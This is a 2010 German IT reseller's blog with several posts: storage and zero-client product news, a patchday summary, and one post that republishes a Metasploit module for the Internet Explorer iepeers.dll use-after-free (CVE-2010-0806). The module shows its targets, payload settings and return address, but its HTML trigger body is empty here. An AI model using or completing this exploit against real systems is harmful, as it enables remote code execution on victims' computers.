Dienstag, 23. März 2010

Donnerstag, 11. März 2010

IE 0-day exploit code veröffentlicht

Dem israelischen Hacker Moshe Ben Abu ist es gelungen, auf Grund von Hinweisen eines McAfee Blogposts eine Sicherheitslücke im Microsoft Internet Explorer auszunutzen: Der Exploitcode wurde bereits veröffentlicht: http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb

Betroffene Versionen: IE 6 und 7

Ganze Story (Englisch): http://blogs.zdnet.com/security/?p=5666&tag=trunk;content

Und hier der Code:


##
# ie_iepeers_pointer.rb
#
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
#  - Microsoft Internet Explorer 7, Windows Vista SP2
#  - Microsoft Internet Explorer 7, Windows XP SP3
#  - Microsoft Internet Explorer 6, Windows XP SP3
#
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
#
# Trancer
# http://www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Microsoft Internet Explorer iepeers.dll use-after-free',
   'Description'    => %q{
    This module exploits a use-after-free vulnerability within iepeers.dll of 
    Microsoft Internet Explorer versions 6 and 7.
    
    NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
   },
   'License'        => MSF_LICENSE,
   'Author'         => [ 
      'Trancer '
      ], 
   'Version'        => '$Revision:$',
   'References'     =>
    [
     [ 'CVE', '2010-0806' ],
     [ 'OSVDB', '62810' ],
     [ 'BID', '38615' ],
     [ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
     [ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
     'InitialAutoRunScript' => 'migrate -f',
    },
   'Payload'        =>
    {
     'Space'         => 1024,
     'BadChars'      => "\x00\x09\x0a\x0d'\\", 
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] 
    ],
   'DisclosureDate' => 'Mar 09 2010',
   'DefaultTarget'  => 0))
 end

 def on_request_uri(cli, request)
  
  # Re-generate the payload
  return if ((p = regenerate_payload(cli)) == nil)

  # Encode the shellcode
  shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

  # Set the return\nops
  ret     = Rex::Text.to_unescape([target.ret].pack('V'))

  # Randomize the javascript variable names
   j_shellcode  = rand_text_alpha(rand(100) + 1)
  j_nops   = rand_text_alpha(rand(100) + 1)
  j_slackspace = rand_text_alpha(rand(100) + 1)
  j_fillblock  = rand_text_alpha(rand(100) + 1)
  j_memory  = rand_text_alpha(rand(100) + 1)
  j_counter  = rand_text_alpha(rand(30) + 2)
  j_ret   = rand_text_alpha(rand(100) + 1)
  j_array   = rand_text_alpha(rand(100) + 1)
  j_function1  = rand_text_alpha(rand(100) + 1)
  j_function2  = rand_text_alpha(rand(100) + 1)
  j_object  = rand_text_alpha(rand(100) + 1)
  j_id   = rand_text_alpha(rand(100) + 1)

  # Build out the message
  html = %Q|

|

  print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

  # Transmit the compressed response to the client
  send_response(cli, html, { 'Content-Type' => 'text/html' })
  
  # Handle the payload
  handler(cli)

 end

end

Mittwoch, 10. März 2010

Dell Precision Mobile Workstation M6500 Update

Bereits kurz vor der CeBIT war zu erfahren, dass die leistungsfähiste mobile Workstation, die wir gestestet haben, die Dell Precision M6500 Ende April ein Update erfährt:


USB3.0 ist ja bereits an Bord, neu hinzukommen wird die Möglichkeit, zwei Festplatten (RAID 0 oder 1) mit einer zusätzlichen SSD über einen integrierten RAID-Controller zu kombinieren: Man hat dann insgesamt drei "Festplatten" zur Verfügung, und kann damit sogar ein RAID 5 betreiben - bislang die einzige mobile Workstation mit RAID 5! Bislang waren "nur" RAIDs mit den beiden internen Festplatten möglich. Das SSD-Device kann typischerweise als Bootdevice und/oder Systempartition fürs Betriebssystem genutzt werden und kann je nach Anwendung zu einem deutlichen Performanceboost führen.

28.03. Update: Die Variante mit 3 "Festplatten" (RAID 5) lässt sich ab sofort bestellen!





Admins: Microsoft März Patchday

Wie jeden 2. Dienstag des Monats veröffentlichte Microsoft am 09.03.2010 Patches für MS Software. Diesen Monat waren 8 Patches dabei, wie folgende Übersicht zeigt - Details zu den veröffentlichten Updates hier.  Das Update kann Sie mit der in Windows integrierten Update-Funktion installiert werden.
Bulletin Titel Anzahl der Lücken / Bewertung / Eigenschaften Betroffene Software
MS10-016 Sicherheitsanfälligkeit in Windows Movie Maker kann Remotecodeausführung ermöglichen (975561) 1 / hoch / Remote-Codeausführung Windows XP, Windows 2000, Server 2003
MS10-017 Sicherheitsanfälligkeiten in Microsoft Office Excel können Remotecodeausführung ermöglichen (980150) 7 / hoch / Remote-Codeausführung Microsoft Excel 2002 SP3, Excel 2003 SP3, Excel 2007 SP1/SP2

Dienstag, 9. März 2010

ZDNet (UK): Pano Logic erhält die Bewertung "sehr gut"



Das bekannte IT-Portal ZD.Net bewertet die Pano Zero-CLient Lösung zur Desktopvirtualisierung mit "sehr gut" ("very good").

Das Urteil der Testredaktion lautet: "Eine hervorragende Wahl für die Desktop-Virtualisierung im Unternehmensmaßstab stellt das Pano-System dar, welches aus einem "zero-footprint" Thinclient (Zero-Client), einem Connectionbroker und einer Remote-Access-Lösung (Pano-Remote) für mobile Mitarbeiter besteht."

Im Original heißt es:

7.5
Editors' Rating    VERY GOOD
Very Good
Typical price:£ 1899

Verdict

An excellent choice for enterprise-scale virtual desktop deployments, Pano System includes a zero-footprint thin client, a connection broker and remote-access server software... Read Full Review.

Pros

  • Smallest, lowest-power thin client we've seen
  • Minimal workload for system administrators
  • Straightforward for end-users

Cons

  • Only works with Windows XP virtual desktops
  • Remote users outside the firewall must have a Windows PC
  • Not suitable for multimedia applications

Key Specs

Dimensions (W x H x D): 8.88x5.1x8.88 cm
Weight: 0.5 kg

Neu in unserem Programm: FalconStor und Nexsan

Falconstor zeigt neues »FDS 2.0« auf der CeBIT

Der Storage-Softwarespezialist FalconStor Software präsentiert Version 2.0 des »File-Interface Deduplication System« (FDS) mit LAN-basierter Deduplizierung der Unternehmensklasse und Hochverfügbarkeit. Dies war der Schwerpunkt des Messeauftritts auf der CeBIT (2. bis 6. März 2010).
Des weiteren präsentierte Falconstor alle aktuellen Lösungen aus dem Virtualisierungs- und Datenschutz-Produktportfolio in Hannover: Neben dem brandneuen FDS 2.0 sind dies »Network Storage Server« (NSS), »Virtual Appliance HyperTrac Backup Accelerator« für »VMware Consolidated Backup«, NSS- und NSS-Virtual-Appliance sowie die »NSS HC Series«-SAN-Appliance.



Das neue FDS 2.0 ist für kleine bis mittelgroße sowie für große Unternehmen ausgelegt, die Speicherplatz und -kosten reduzieren möchten, indem Daten effizienter auf Festplatten geschrieben werden. Durch die neu eingeführte Hochverfügbarkeit behalten Unternehmen jeder Größe den Zugriff auf ihre gesicherten Daten, wobei laut Falconstor gewährleistet ist, dass Backups stets innerhalb kurzer Backup-Fenster durchgeführt werden können – was besonders wichtig für Datenbanken ist, auf denen das ERP, das CRM oder andere wichtige Applikationen des Unternehmens laufen.

Unterstützt »Symantec OpenStorage« (OST)
Weitere Funktionen in FDS 2.0 sind unter anderem eine Unterstützung für »Symantec OpenStorage« (OST); dadurch ergeben sich 5,4 TByte pro Stunde Durchsatz an Backup-Daten und eine Ingest-Rate von 1,5 GByte/s über zwei 10-Gigabit-Ethernet-Verbindungen für die doppelte Leistung. Durch ein verbessertes Fan-in-Verhältnis von 150 zu 1 sollen verteilte Umgebungen besser unterstützt und der Bereich der globalen Deduplizierung verbessert werden. Verbessert wurde auch das Replikations-Dashboard für eine Überwachung in Echtzeit.

Als erster Falconstor-Technologie-Partner nimmt Nexsan die neue Version in sein Storage-Angebot auf und integriert die Lösung in die »DeDupe SG 2.0«-Familie von Deduplizierungs-Appliances.

Ab sofort erhalten Sie sämtliche FalconStor und Nexsan Produkte bei uns!

Montag, 8. März 2010

Fujitsu Zero-Client Monitor

Mit dem D602 präsentiert auf der diesjährigen CeBIT nun auch Fujitsu einen echten Zero-Client. Dabei beruht die verwendete Technologie vollständig auf der Zero-Client Technologie des US-Herstellers Pano Logic, Inc., dessen Solution Partner wir bereits als eines der ersten europäischen Systemhäuser von erster Stunde an sind.

 
Fujitsus Zero-Client ist letzten Endes ein intelligenter Monitor, der quasi direkt an den Server angeschlossen wird und somit einen kompletten PC-Arbeitsplatz darstellt. Er braucht prinzipiell nur zwei Kabel: Strom und Ethernet, damit die Informationen von und zur Arbeitsstation übertragen werden können. Maus und Tastatur können an den Monitor angeschlossen werden.


(C) 2010 Fujitsu

Der Monitor des Zero-Clients D602 ist ein 22-Zoll-TFT mit einer nativen Auflösung von 1.680 x 1.050 Pixeln, bietet einen Einblickwinkel von 170 Grad und ist 250 cd/qm hell. Für Peripherie gibt es drei USB-Anschlüsse und einen Stereoausgang.

Der Zero-Client D602 soll bereits im Ende März/Anfang März 2010 verfügbar sein und ca. 449 Euro kosten.
Zukünftige Versionen des Zero-Clients sollen sogar ganz ohne Stromkabel auskommen. Stattdessen kommt der Strom über das Netzwerkkabel zum Gerät. Power over Ethernet  (IEEE 802.03af) liefert ca. 15 Watt über das Netzwerkkabel. 

Da das Gerät vollständig auf der Pano-Technologie beruht und vom Pano-Management-Server gesteuert wird, ist es möglich, die Geräte mit Pano Zero-Clients in einer gemischten Umgebung zu betreiben!

                  http://virtualization.sys-con.com/node/1304177

SAN Performance Booster von Violin Memory / FalconStor

Der Enterprise-SSD Hersteller Violin Memory hat mit seinem Modell 1010 eine bis zu 4 TB großen Flash-Speicherappliance auf der CeBIT präsentiert, der eine kontinuierlich hohe Performance mit einer niedrigen Latenzzeit von weniger als 100 µs und eine hohe Betriebsbereitschaft bietet (durch automatisches Active Sparing und Hot-Swap-Fähigkeit der Flash-Module).



Auf dem Stand von FalconStor wurde die bald auch von FalcoStor unter dem Namen FalconStor NSS SAN Accelerator Appliance (bauglich mit der Violin 1010) vertriebene Lösung vorgeführt, welche auf zum Patent angemeldeten Flash-RAID-Algorithmen basiert. Er bietet für Enterprise-Anwendungen eine hohe Performance und Zuverlässigkeit zu einem günstigeren Preis als bei herkömmlichen hochleistungsfähigen Speichersystemen mit Halbleiterfestplatten (Solid State Disks - SSD).
Um beispielsweise einen Leistungsgewinn von 100 Prozent zu erzielen, ist der FalconStor NSS SAN Accelerator in Verbindung mit einer Solid State Disk über dreimal günstiger als im Vergleich zu einem SAN Upgrade mit zusätzlichen Disk-Systemen.
Der FalconStor NSS SAN Accelerator ist voraussichtlich ab Mai 2010 zu einem Listenpreis von 25.600 Euro erhältlich. In diesem Preis ist ein RAID-geschützter Solid-State-Speicherarray mit 500 Gigabyte Speicherkapazität bereits enthalten.